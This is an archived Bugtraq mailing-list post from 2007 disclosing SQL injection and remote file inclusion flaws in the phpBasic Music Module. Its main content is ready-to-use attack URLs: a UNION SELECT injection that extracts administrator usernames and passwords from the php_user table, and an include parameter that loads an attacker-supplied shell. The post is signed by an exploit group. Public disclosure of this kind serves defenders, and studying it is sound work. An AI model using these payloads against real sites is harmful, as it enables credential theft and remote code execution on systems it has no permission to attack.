[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
From: <pete.houston.17187@xxxxxxxxx>
Date: 23 Oct 2007 14:22:26 -0600

Software : phpBasic Music Module
Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :
Proof of concept :
http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]
Xploit admin user account :
http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :
http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===

Prev by Date: [USN-531-2] dhcp vulnerability
Next by Date: [USN-536-1] Thunderbird vulnerabilities
Previous by thread: [Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
Next by thread: Korean GHBoard Multiple Vulnerabilities by Xcross87
Index(es):
- Date
- Thread